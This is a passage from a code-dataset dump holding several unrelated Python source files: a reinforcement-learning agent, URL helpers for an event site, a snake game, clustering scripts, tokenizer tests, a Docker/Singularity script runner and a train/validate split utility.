None:\n self.alpha = x[..., 0].sigmoid()\n self.zeta = x[..., 1].sigmoid()\n self.beta = x[..., 2].exp()\n self.bias = x[..., 3]\n else:\n self.alpha = .25*ones(self.runs)\n self.zeta = .95*ones(self.runs)\n self.beta = 10.*ones(self.runs)\n\n self.V0 = zeros(self.runs)\n self.npar = 4\n\n # set initial value vector\n self.values = [self.V0]\n self.offers = []\n self.logits = []\n \n def update_beliefs(self, b, t, response_outcomes, mask=None):\n \n if mask is None:\n mask = ones(self.runs) \n \n V = self.values[-1]\n o = response_outcomes[-1][:, -2]\n \n # update choice values\n self.values.append(V + mask*self.alpha*(o - V))\n\n def planning(self, b, t, offers):\n \"\"\"Compute response probability from values.\"\"\"\n V = self.values[-1]\n b_soc = (1 + V)/2\n b_vis = offers\n b_int = b_soc * self.zeta + b_vis * (1 - self.zeta)\n ln = b_int.log() - (1 - b_int).log()\n \n logits = self.beta * ln + self.bias\n logits = torch.stack([-logits, logits], -1)\n self.logits.append(logits) \n\n def sample_responses(self, b, t):\n cat = Categorical(logits=self.logits[-1])\n \n return cat.sample()\n \nclass RLTempRevLearn(Discrete):\n \"\"\"here we implement a reinforcement learning agent for the temporal \n reversal learning task. \n \"\"\"\n \n def __init__(self, runs=1, blocks=1, trials=1):\n \n na = 3 # number of actions\n ns = 2 # number of states\n no = 4 # number of outcomes\n super(RLTempRevLearn, self).__init__(runs, blocks, trials, na, ns, no)\n \n def set_parameters(self, x=None, set_variables=True):\n \n if x is not None:\n self.alpha = x[..., 0].sigmoid()\n self.kappa = x[..., 1].sigmoid()\n self.beta = x[..., 2].exp()\n self.bias = x[..., 3]\n else:\n self.alpha = .25*ones(self.runs)\n self.kappa = ones(self.runs)\n self.beta = 10.*ones(self.runs)\n self.bias = zeros(self.runs)\n \n if set_variables:\n self.V0 = zeros(self.runs, self.na)\n self.V0[:, -1] = self.bias\n self.npar = 4\n \n # set initial value vector\n self.values = [self.V0]\n self.offers = []\n self.outcomes = []\n self.logits = []\n \n def update_beliefs(self, b, t, response_outcome, mask=None):\n \n if mask is None:\n mask = ones(self.runs)\n \n V = self.values[-1]\n \n res = response_outcome[0]\n obs = response_outcome[1]\n \n hints = res == 2\n nothints = ~hints\n lista = arange(self.runs)\n \n # update choice values\n V_new = zeros(self.runs, self.na)\n V_new[:, -1] = self.bias\n \n if torch.get_default_dtype() == torch.float32:\n rew = 2.*obs[nothints].float() - 1.\n else:\n rew = 2.*obs[nothints].double() - 1.\n \n choices = res[nothints]\n l = lista[nothints]\n V1 = V[l, choices]\n V_new[l, choices] = V1 + self.alpha[nothints] * mask[nothints] * (rew - V1)\n \n V2 = V[l, 1 - choices]\n V_new[l, 1 - choices] = V2 - \\\n self.alpha[nothints] * self.kappa[nothints] * mask[nothints] * (rew + V2)\n \n cue = obs[hints] - 2\n V_new[hints, cue] = 1.\n V_new[hints, 1 - cue] = - self.kappa[hints]\n self.values.append(V_new)\n\n def planning(self, b, t, offers):\n \"\"\"Compute response probability from stimuli values for the given offers.\n Here offers encode location of stimuli A and B.\n \"\"\"\n self.offers.append(offers)\n loc1 = offers == 0\n loc2 = ~loc1\n \n V = zeros(self.runs, self.na)\n V[loc1] = self.values[-1][loc1]\n if loc2.any():\n V[loc2, 0] = self.values[-1][loc2, 1]\n V[loc2, 1] = self.values[-1][loc2, 0]\n V[loc2, -1] = self.values[-1][loc2, -1]\n \n self.logits.append(self.beta.reshape(-1, 1) * V) \n\n def sample_responses(self, b, t):\n logits = self.logits[-1]\n cat = Categorical(logits=logits)\n \n return cat.sample()","sub_path":"agents/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"556285697","text":"import re\nimport urllib\nfrom slugify import slugify\n\nEVENT_ID_REGEX = r'(?:\\d+|[^/?#]+:[^/?#]+)'\n\n\ndef dd_event_url(eid, kwargs=None):\n kwarg_string = '?%s' % urlencode(kwargs) if kwargs else ''\n return 'https://www.dancedeets.com%s%s' % (dd_relative_event_url(eid), kwarg_string)\n\n\ndef dd_relative_event_url(eid):\n if isinstance(eid, basestring):\n return '/events/%s/' % eid\n else:\n event = eid\n slug = slugify(unicode(event.name))\n return '/events/%s/%s' % (event.id, slug)\n\n\ndef dd_short_event_url(eid):\n return 'https://dd.events/e-%s' % eid\n\n\ndef raw_fb_event_url(eid):\n return 'https://www.facebook.com/events/%s/' % eid\n\n\ndef dd_admin_event_url(eid):\n return 'https://www.dancedeets.com/events/admin_edit?event_id=%s' % eid\n\n\ndef dd_admin_source_url(eid):\n return 'https://www.dancedeets.com/sources/admin_edit?source_id=%s' % eid\n\n\ndef event_image_url(eid, **kwargs):\n encoded_kwargs = urlencode(kwargs)\n url = 'https://flyers.dancedeets.com/%s' % eid\n if encoded_kwargs:\n return '%s?%s' % (url, encoded_kwargs)\n else:\n return url\n\n\ndef dd_search_url(location, keywords=''):\n return 'https://www.dancedeets.com/?' + urlencode({\n 'location': location,\n 'keywords': keywords,\n })\n\n\ndef urlencode(kwargs, doseq=False):\n if doseq:\n new_kwargs = {}\n for k, v in kwargs.iteritems():\n new_kwargs[unicode(k).encode('utf-8')] = [unicode(v_x).encode('utf-8') for v_x in v]\n kwargs = new_kwargs\n else:\n kwargs = dict((unicode(k).encode('utf-8'), unicode(v).encode('utf-8')) for (k, v) in kwargs.iteritems())\n return urllib.urlencode(kwargs, doseq=doseq)\n\n\ndef get_event_id_from_url(url):\n if '#' in url:\n url = url.split('#')[1]\n match = re.search(r'eid=(\\d+)', url)\n if not match:\n match = re.search(r'/events/(%s)(?:[/?]|$)' % EVENT_ID_REGEX, url)\n if not match:\n match = re.search(r'event_id=(%s)(?:[/?]|$)' % EVENT_ID_REGEX, url)\n if not match:\n return None\n return match.group(1)\n","sub_path":"server/dancedeets/util/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"23206630","text":"\nfrom ursina import *\napp = Ursina()\n\nsnake = Entity(model='cube', texture = 'assets\\snake', scale=0.4, z=-1, collider='box')\nground = Entity(model='cube', texture='grass',rotation=(90,0,0),scale=(5,1,5), z=1)\napple = Entity(model='cube', texture='assets\\\\apple', scale=0.4, position=(1,-1,-1), collider='mesh')\nbody = [Entity(model='cube', scale =0.2, texture='assets\\\\body') for i in range(14)]\n\ncamera.orthographic = True\ncamera.fov = 8\n\nfrom random import randint\ndx = dy = 0\ndef update():\n info = snake.intersects()\n if info.hit:\n apple.x = randint(-4,4)/2\n apple.y = randint(-4,4)/2\n new = Entity(model='cube', z = -1, scale=0.2, texture='assets\\\\body')\n body.append(new)\n for i in range(len(body)-1,0,-1):\n pos = body[i-1].position\n body[i].position = pos\n body[0].x = snake.x\n body[0].y = snake.y\n snake.x += time.dt * dx\n snake.y += time.dt * dy\n\ndef input(key):\n global dx,dy\n for x,y,z in zip(['d','a'],[2,-2],[270,90]):\n if key==x:\n snake.rotation_z = z\n dx = y\n dy = 0\n for x,y,z in zip(['w','s'],[2,-2],[180,0]):\n if key == x:\n snake.rotation_z = z\n dy = y\n dx = 0\n\napp.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"68465615","text":"import sys\nimport pandas as pd\nfrom sklearn.cluster import KMeans, AgglomerativeClustering\nfrom sklearn.mixture import GaussianMixture\n\n# consts \n# ------------------------\n\nDEFAULT_DATA_PATH = \"./Frogs_MFCCs.csv\"\n\n# metric functions\n# --------------------------------------------\n\ndef total_sum_of_squares_df(df, centroid = None):\n \"\"\" Calculates and returns the TTS of the given DataFrame \"\"\"\n if centroid is None:\n centroid = find_centroid_df(df)\n \n return total_sum_of_squares(df.as_matrix(), centroid)\n\ndef total_sum_of_squares(data, centroid):\n \"\"\" Calculates and returns the TTS of the given matrix\n \n Arguments:\n data - Iterable\n centroid - Array\n \"\"\" \n total = 0\n \n for row in data:\n for index, value in enumerate(row):\n diff = value - centroid[index]\n diffsq = diff * diff\n total += diffsq\n \n return total\n\n\ndef find_centroid_df(df):\n \"\"\" Calculates and returns the centroid for a DataFrame \"\"\"\n return df.mean()\n\n# clustering functions\n# --------------------------\n\ndef get_cluster_indexes(assignments):\n cluster_slices = {}\n \n for index, assignment in enumerate(assignments):\n if assignment not in cluster_slices:\n cluster_slices[assignment] = list()\n \n cluster_slices[assignment].append(index)\n \n return cluster_slices\n\ndef get_cluster_data(df, assignments):\n cluster_indexes = get_cluster_indexes(assignments)\n \n cluster_data = {k: df.iloc[v] for k, v in cluster_indexes.items()}\n \n return cluster_data\n\ndef get_clusters(df, assignments):\n \"\"\"Returns an array of tuples with (, , )\"\"\"\n \n return [\n (cluster, find_centroid_df(cluster_data), cluster_data) \n for cluster, cluster_data \n in get_cluster_data(df, assignments).items()\n ]\n \n\n# model runners\n# ------------------------------------------\n\ndef run_gaussian_mixture(model, data):\n model.fit(data)\n return model.predict(data)\n\ndef run_kmeans(model, data):\n model.fit(data)\n return model.predict(data)\n\ndef run_hclustering(model, data):\n return model.fit_predict(data)\n\n# data functions \n# -------------------------------------------\n\ndef clean_data(data):\n # Strip whitespaces from all string values\n # and replace \"?\" with None,\n # and drop all na rows\n data = data.apply(lambda x: x.str.strip() if x.dtype == \"object\" else x) \\\n .replace([\"?\"], [None]) \\\n .dropna()\n\n data = data.iloc[:,2:22]\n return data\n\ndef prepare_data(data):\n return data\n\ndef read_data(path):\n dataset = pd.read_csv(path)\n dataset = clean_data(dataset)\n dataset = prepare_data(dataset)\n return dataset\n\n# main\n# -----------------------------------------\n\ndef main():\n data_path = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_DATA_PATH\n\n print(\"Reading data from: %s\" % data_path) \n df = read_data(data_path)\n\n print(\"Calculating tss...\")\n tss = total_sum_of_squares_df(df)\n print(\"tss = %s\" % tss)\n print(\"\")\n\n models = [\n (\"KMeans\", lambda k: KMeans(n_clusters=k), run_kmeans),\n (\"H-Clustering\", lambda k: AgglomerativeClustering(n_clusters=k), run_hclustering),\n (\"Gaussian Mixture\", lambda k: GaussianMixture(n_components=k, reg_covar=0.001), run_gaussian_mixture)\n ]\n\n for model_name, create_model, run_model in models:\n print(\"-------------------------------\")\n print(model_name)\n print(\"-------------------------------\")\n print(\"\")\n for k in range(1,11):\n print(\"Calculating %s clusters...\" % k)\n print(\"\")\n model = create_model(k)\n assignments = run_model(model, df)\n clusters = get_clusters(df, assignments)\n\n twss = 0\n for cluster, centroid, cluster_slice in clusters:\n cluster_tss = total_sum_of_squares_df(cluster_slice, centroid)\n print(\"cluster %s | tss = %s | size = %s\" % (cluster, cluster_tss, len(cluster_slice)))\n twss += cluster_tss\n\n print(\"twss/tss = %s/%s = %s\" % (twss, tss, twss / tss))\n print(\"\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Anuran_Clustering.py","file_name":"Anuran_Clustering.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"166347400","text":"class MyError(Exception):\n pass\ndef localize_objects_uri(uri,name_):\n \"\"\"Localize objects in the image on Google Cloud Storage\n\n Args:\n uri: The path to the file in Google Cloud Storage (gs://...)\n \"\"\"\n from google.cloud import vision\n from google.cloud import datastore\n \n client = vision.ImageAnnotatorClient()\n\n image = vision.types.Image()\n image.source.image_uri = uri\n\t\n objects = client.label_detection(image=image).label_annotations\n ds_client = datastore.Client()\n list1 = []\n print('Number of objects found: {}'.format(len(objects)))\n for object_ in objects:\n entity = datastore.Entity(ds_client.key('Label_Detection', name_ + \"/\" + object_.description))\n list1.append(name_)\n list1.append(object_.description)\n list1.append(object_.score)\n entity.update({\n 'FileName' : list1[0] ,\n 'LabelName' : list1[1] ,\n 'Confidence' : list1[2]\n })\n list1 = []\n \n #print('\\n{} (confidence: {})'.format(object_.description, object_.score))\n \ndef hello_gcs(event, context):\n \"\"\"Triggered by a change to a Cloud Storage bucket.\n Args:\n event (dict): Event payload.\n context (google.cloud.functions.Context): Metadata for the event.\n \"\"\"\n file = event['name']\n bucket = event['bucket']\n url=\"gs://{}/{}\".format(bucket,file)\n #print(\"gs://{}/{}\".format(bucket,file))\n ext = file[-4:]\n list_=('.jpg','.png','jpeg')\n try:\n if ext not in list_:\n raise MyError\n localize_objects_uri(url,file)\n except MyError:\n print(\"Not an image!\")\n \n \n","sub_path":"q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"546392972","text":"import logging\n\nimport pytest\n\nfrom plenum.common.messages.node_messages import CatchupReq\nfrom stp_core.common.log import getlogger\nfrom plenum.test.helper import sdk_send_random_and_check\n\nlogger = getlogger()\nleger_id = 1\n\n\ndef test_receive_incorrect_catchup_request_with_end_greater_catchuptill(looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch):\n end = 15\n catchup_till = 10\n\n def _check_discard(msg, reason, logMethod=logging.error, cliOutput=False):\n assert reason.find(\"not able to service since \"\n \"end = {} greater than \"\n \"catchupTill = {}\".format(end, catchup_till))\n\n req = CatchupReq(leger_id, 0, end, catchup_till)\n _process_catchup_req(req,\n _check_discard,\n looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch)\n\n\ndef test_receive_incorrect_catchup_request_with_start_greater_end(looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch):\n start = 10\n end = 5\n\n def _check_discard(msg, reason, logMethod=logging.error, cliOutput=False):\n assert reason.find(\"not able to service since \"\n \"start = {} greater than \"\n \"end = {}\"\n .format(start, end))\n\n req = CatchupReq(leger_id, start, end, 11)\n _process_catchup_req(req,\n _check_discard,\n looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch)\n\n\ndef test_receive_incorrect_catchup_request_with_catchuptill_greater_ledger_size(\n looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch):\n catchup_till = 100\n req = CatchupReq(leger_id, 0, 10, catchup_till)\n ledger_size = txnPoolNodeSet[0].ledgerManager.getLedgerForMsg(req).size\n\n def _check_discard(msg, reason, logMethod=logging.error, cliOutput=False):\n assert reason.find(\"not able to service since \"\n \"catchupTill = {} greater than \"\n \"ledger size = {}\"\n .format(catchup_till, ledger_size))\n\n _process_catchup_req(req,\n _check_discard,\n looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch)\n\n\ndef _process_catchup_req(req: CatchupReq,\n check_discard,\n looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch):\n sdk_send_random_and_check(looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n 4)\n ledger_manager = txnPoolNodeSet[0].ledgerManager\n monkeypatch.setattr(ledger_manager.owner, 'discard', check_discard)\n ledger_manager.processCatchupReq(req, \"frm\")\n","sub_path":"plenum/test/node_catchup/test_incorrect_catchup_request.py","file_name":"test_incorrect_catchup_request.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"467007389","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 03 17:05:01 2014\n\n@author: Sarthak Khanna\n\"\"\"\n\n\nd = raw_input()\nd = str(d)\n\nn = raw_input()\nn = int(n)\nx=[]\ny=[]\nl = len(d)\ni = 0\nfor i in range(n):\n a,b = raw_input().split()\n a = int(a)\n x.append(a) \n b = int(b)\n y.append(b)\n \n\nfor i in range(n):\n c = x[i]%l\n c = int(c)\n \n e = y[i]%l\n e = int(e)\n \n if (str(d[c-1])==str(d[e-1])):\n print('Yes')\n else:\n print('No')","sub_path":"5.Girlfriend's demands.py","file_name":"5.Girlfriend's demands.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"366442145","text":"# -*- coding: utf-8 -*-\n\nimport os\n\nfrom os.path import dirname, join\nfrom setuptools import setup, find_packages, Command\n\n# Hack because logging + setuptools sucks.\nimport multiprocessing\n\n\ndef fread(fn):\n with open(join(dirname(__file__), fn), 'r') as f:\n return f.read()\n\ntests_require = ['nose', 'unittest2', 'pycrypto']\n\nsetup(\n name='oauthlib',\n version='0.0.2',\n description='A generic, spec-compliant, thorough implementation of the OAuth request-signing logic',\n long_description=fread('README.rst'),\n author='Idan Gazit',\n author_email='idan@gazit.me',\n url='https://github.com/idangazit/oauthlib',\n license=fread('LICENSE'),\n packages=find_packages(exclude=('tests', 'docs')),\n test_suite='nose.collector',\n tests_require=tests_require,\n extras_require={'test': tests_require},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"54746247","text":"# Problem 1\ndef merge(a, b, N, letter_indices):\n # Initialise indices\n i = 0\n j = 0\n merged_list = []\n\n\n while i < len(a):\n if j >= len(b) or a[i] <= b[j]:\n merged_list.append(a[i])\n N[letter_indices[a[i]]] += j\n i += 1\n else:\n merged_list.append(b[j])\n j += 1\n\n if i == len(a):\n return merged_list + b[j:]\n else:\n return merged_list\n\n\ndef rank_right(l):\n \"\"\"\n Returns the number of items after each index of value lower than the item at that index\n\n Note: N is a single shared instance - when the merge function updates it it is automatically\n updated here as well.\n Letter_indices represents each letter's index in the N list.\n \"\"\"\n N = [0] * len(l)\n letter_indices = {number: index for (index, number) in enumerate(l)}\n\n def iteration(l, N, letter_indices):\n # Handle single-element lists\n if len(l) <= 1:\n return l\n\n # Handle larger lists\n mid = len(l) // 2\n first_chunk = iteration(l[:mid], N, letter_indices)\n second_chunk = iteration(l[mid:], N, letter_indices)\n result = merge(first_chunk, second_chunk, N, letter_indices)\n return result\n\n # Note: we don't care about the return value here - N is updated automatically\n iteration(l, N, letter_indices)\n\n return N\n\n\n# Tests\nassert rank_right([3, 6, 5, 4, 2, 8, 1, 0, 7, 9]) == [3, 5, 4, 3, 2, 3, 1, 0, 0, 0]\nassert rank_right([2, 6, 1, 3, 5, 0, 4]) == [2, 5, 1, 1, 2, 0, 0]\nassert rank_right([3, 1, 7, 0, 6, 5, 2, 4, 9, 8]) == [3, 1, 5, 0, 3, 2, 0, 0, 1, 0]\n\n# Problem 2\n\n\"\"\"\n This shuffle function is heavily biased in favour of the sorted position of the list.\n \n I.e. On average, the element `0` is likely to be found close to the front of the list,\n while the greatest item is likely to be found to the end of the list.\n\"\"\"\n","sub_path":"Assessment/4th March.py","file_name":"4th March.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"599620094","text":"import cmath\n\nprint(\"ax**2+bx+c=0\")\na = int(input(\"enter the value a: \"))\nb = int(input(\"enter the value b: \"))\nc = int(input(\"enter the value c: \"))\n\n#discriminant D= b**2 - 4ac\nd = (b**2)-(4*a*c) #b**2 is denote by squar\n\nsol1 = (-b + cmath.sqrt(d))/2*a # cmath.sqrt is squar root\nsol2 = (-b - cmath.sqrt(d))/2*a\n\nif d > 0:\n print(\" two distinct real root \")\nelif d == 0:\n print(\"the two real equal root\")\nelif d < 0:\n print(\" then two complex root \")\nprint(\"solution_1 : %s , solution_2 : %s \" % (sol1, sol2))\n","sub_path":"quadratic.py","file_name":"quadratic.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"469256368","text":"from abc import abstractmethod\nimport json\nimport os\nimport shutil\nfrom typing import List, Union, cast\nimport tarfile\n\nfrom numpy import source\nfrom .dockerimage import DockerImage, RemoteDockerImage\nfrom ._bindmount import BindMount\n\ndef run_scriptdir_in_container(*,\n scriptdir: str,\n image_name: str,\n bind_mounts_path: str,\n output_dir: str,\n nvidia_support: bool\n):\n with open(bind_mounts_path, 'r') as f:\n x = json.load(f)\n bind_mounts = [BindMount.deserialize(a) for a in x]\n \n run_scriptdir_in_container_2(scriptdir=scriptdir, image_name=image_name, bind_mounts=bind_mounts, output_dir=output_dir, nvidia_support=nvidia_support)\n\ndef run_scriptdir_in_container_2(*,\n scriptdir: str,\n image_name: str,\n bind_mounts: List[BindMount],\n output_dir: str,\n nvidia_support: bool\n):\n import kachery_client as kc\n\n run_path = f'{scriptdir}/run'\n env_path = f'{scriptdir}/env'\n input_dir = f'{scriptdir}/input'\n\n remove = False if os.getenv('HITHER_CONTAINER_DEBUG', None) in ['TRUE', '1'] else True\n with kc.TemporaryDirectory(remove=remove) as tmpdir:\n # entrypoint script to run inside the container\n entry_sh_script = f'''\n #!/bin/bash\n\n set -e\n\n # do not buffer the stdout\n export PYTHONUNBUFFERED=1\n\n export HITHER_RUNNING_FILE=/running/running.txt\n\n mkdir -p /working/output\n echo \"dummy\" > /working/output/dummy\n cd /working\n source ./env\n exec ./run\n '''\n entry_sh_path = tmpdir + '/entry.sh'\n kc.ShellScript(entry_sh_script).write(entry_sh_path)\n\n ##############################################\n all_bind_mounts: List[BindMount] = [\n BindMount(target='/hither-entry.sh', source=entry_sh_path, read_only=True),\n BindMount(target='/working/run', source=run_path, read_only=True),\n BindMount(target='/working/env', source=env_path, read_only=True)\n ]\n for bm in bind_mounts:\n all_bind_mounts.append(bm)\n \n running_dir = tmpdir + '/running'\n os.mkdir(running_dir)\n with open(running_dir + '/running.txt', 'w') as f:\n f.write('Process will end when this file is deleted')\n all_bind_mounts.append(BindMount(target='/running', source=running_dir, read_only=False))\n \n use_singularity = os.getenv('HITHER_USE_SINGULARITY', None)\n if use_singularity in [None, 'FALSE', '0']:\n _run_script_in_container_docker(\n all_bind_mounts=all_bind_mounts,\n image_name=image_name,\n input_dir=input_dir,\n output_dir=output_dir,\n tmpdir=tmpdir,\n script_path='/hither-entry.sh'\n )\n elif use_singularity in ['TRUE', '1']:\n _run_script_in_container_singularity(\n all_bind_mounts=all_bind_mounts,\n image_name=image_name,\n input_dir=input_dir,\n output_dir=output_dir,\n tmpdir=tmpdir,\n script_path='/hither-entry.sh',\n nvidia_support=nvidia_support\n )\n else:\n raise Exception('Unexpected value of HITHER_USE_SINGULARITY environment variable')\n\ndef _run_script_in_container_docker(*,\n all_bind_mounts: List[BindMount],\n image_name: str,\n input_dir: Union[str, None], # corresponds to /input in the container\n output_dir: Union[str, None], # corresponds to /output in the container\n tmpdir: str,\n script_path: str # path of script inside the container\n):\n import docker\n from docker.types import Mount\n from docker.models.containers import Container\n\n client = docker.from_env()\n\n # create the mounts\n mounts = [\n Mount(target=x.target, source=x.source, type='bind', read_only=x.read_only)\n for x in all_bind_mounts\n ]\n\n # create the container\n container = cast(Container, client.containers.create(\n image_name,\n [script_path],\n mounts=mounts,\n network_mode='host'\n ))\n\n # copy input directory to /working/input\n if input_dir:\n input_tar_path = tmpdir + '/input.tar.gz'\n with tarfile.open(input_tar_path, 'w:gz') as tar:\n tar.add(input_dir, arcname='input')\n with open(input_tar_path, 'rb') as tarf:\n container.put_archive('/working/', tarf)\n\n # run the container\n container.start()\n logs = container.logs(stream=True)\n for a in logs:\n for b in a.split(b'\\n'):\n if b:\n print(b.decode())\n \n # copy output from /working/output\n if output_dir:\n strm, st = container.get_archive(path='/working/output/')\n output_tar_path = tmpdir + '/output.tar.gz'\n with open(output_tar_path, 'wb') as f:\n for d in strm:\n f.write(d)\n with tarfile.open(output_tar_path) as tar:\n tar.extractall(tmpdir)\n for fname in os.listdir(tmpdir + '/output'):\n shutil.move(tmpdir + '/output/' + fname, output_dir + '/' + fname)\n \n container.remove()\n\ndef _run_script_in_container_singularity(*,\n all_bind_mounts: List[BindMount],\n image_name: str,\n input_dir: Union[str, None], # corresponds to /input in the container\n output_dir: Union[str, None], # corresponds to /output in the container\n tmpdir: str,\n script_path: str, # path of script inside the container\n nvidia_support: bool\n):\n import kachery_client as kc\n\n bind_opts = ' '.join([\n f'--bind {bm.source}:{bm.target}'\n for bm in all_bind_mounts\n ])\n\n nv_opts = '--nv' if nvidia_support else ''\n\n ss = kc.ShellScript(f'''\n #!/bin/bash\n\n # we really should have the -C option here, but it seems to be causing trouble\n singularity exec \\\\\n {bind_opts} {nv_opts} \\\\\n --bind {input_dir}:/working/input \\\\\n --bind {output_dir}:/working/output \\\\\n docker://{image_name} \\\\\n {script_path}\n ''')\n ss.start()\n ss.wait()","sub_path":"hither2/run_scriptdir_in_container.py","file_name":"run_scriptdir_in_container.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"469668307","text":"# Copyright 2018 The HuggingFace Inc. team.\n# Copyright 2019 Guillaume Becquin\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport tempfile\nfrom pathlib import Path\nimport pytest\nfrom transformers.data.processors.glue import QnliProcessor\nfrom transformers.file_utils import get_from_cache\nfrom transformers.tokenization_bert import BertTokenizer\nfrom transformers.tokenization_distilbert import DistilBertTokenizer\nfrom rust_tokenizers import PyBertTokenizer\nimport os\n\n\n@pytest.mark.slow\nclass TestTokenizationSST2:\n def setup_class(self):\n self.processor = QnliProcessor()\n # Note: these tests do not download automatically test datasets. Please download them manually and update your\n # environment variables accordingly\n self.examples = self.processor.get_train_examples(os.environ[\"QNLI_PATH\"])\n self.test_dir = Path(tempfile.mkdtemp())\n\n def test_tokenization_bert(self):\n # Given\n self.base_tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True,\n cache_dir=self.test_dir)\n self.rust_tokenizer = PyBertTokenizer(\n get_from_cache(self.base_tokenizer.pretrained_vocab_files_map['vocab_file']['bert-base-uncased']),\n do_lower_case=True)\n output_baseline = []\n for example in self.examples:\n output_baseline.append(self.base_tokenizer.encode_plus(example.text_a,\n text_pair=example.text_b,\n add_special_tokens=True,\n return_overflowing_tokens=True,\n return_special_tokens_mask=True,\n max_length=128))\n\n # When\n output_rust = self.rust_tokenizer.encode_pair_list(\n [(example.text_a, example.text_b) for example in self.examples],\n max_len=128,\n truncation_strategy='longest_first',\n stride=0)\n\n # Then\n for rust, baseline in zip(output_rust, output_baseline):\n assert (rust.token_ids == baseline['input_ids'])\n assert (rust.segment_ids == baseline['token_type_ids'])\n assert (rust.special_tokens_mask == baseline['special_tokens_mask'])\n\n def test_tokenization_distilbert(self):\n # Given\n self.base_tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased', do_lower_case=True,\n cache_dir=self.test_dir)\n self.rust_tokenizer = PyBertTokenizer(\n get_from_cache(self.base_tokenizer.pretrained_vocab_files_map['vocab_file']['distilbert-base-uncased']),\n do_lower_case=True)\n output_baseline = []\n for example in self.examples:\n output_baseline.append(self.base_tokenizer.encode_plus(example.text_a,\n text_pair=example.text_b,\n add_special_tokens=True,\n return_overflowing_tokens=True,\n return_special_tokens_mask=True,\n max_length=128))\n\n # When\n output_rust = self.rust_tokenizer.encode_pair_list(\n [(example.text_a, example.text_b) for example in self.examples],\n max_len=128,\n truncation_strategy='longest_first',\n stride=0)\n\n # Then\n for rust, baseline in zip(output_rust, output_baseline):\n assert (rust.token_ids == baseline['input_ids'])\n assert (rust.segment_ids == baseline['token_type_ids'])\n assert (rust.special_tokens_mask == baseline['special_tokens_mask'])\n","sub_path":"python-bindings/tests/test_tokenization_qnli.py","file_name":"test_tokenization_qnli.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"34151406","text":"import random\nimport shutil\nfrom pathlib import Path\nimport argparse\n\n\ndef _path(_dir):\n path_obj = Path(_dir)\n\n if not path_obj.exists():\n path_obj.mkdir(parents=True, exist_ok=True)\n if path_obj.is_dir():\n return path_obj\n else:\n raise argparse.ArgumentTypeError(\"Not a directory\")\n\n\ndef args_parser():\n parser = argparse.ArgumentParser(\"split training data to train and validate\")\n parser.add_argument(\"-d\", \"--data_dir\", help=\"folder contain train images and training labels\", type=_path)\n parser.add_argument(\"-s\", \"--seed\", help=\"random seed for train val split\", default=1, type=float)\n parser.add_argument(\"-r\", \"--ratio\", help=\"validate ratio for train val split\", default=0.05, type=float)\n parser.add_argument(\"-o\", \"--out_dir\", help=\"output directory for train and validate data\", type=_path)\n _args, _ = parser.parse_known_args()\n return _args\n\n\ndef _mk_dir(out_path):\n \"\"\"\n Make training and validate directory to store data in PASCOL format\n :param out_path: _path obj\n :return: list contain train_img, train_label, val_img, val_label\n \"\"\"\n train_img = out_path.joinpath(\"train\", \"image\")\n train_label = out_path.joinpath(\"train\", \"label\")\n val_img = out_path.joinpath(\"validate\", \"image\")\n val_label = out_path.joinpath(\"validate\", \"label\")\n\n _dirs = [train_img, train_label, val_img, val_label]\n for d in _dirs:\n if not d.exists():\n d.mkdir(parents=True, exist_ok=False)\n return _dirs\n\n\ndef 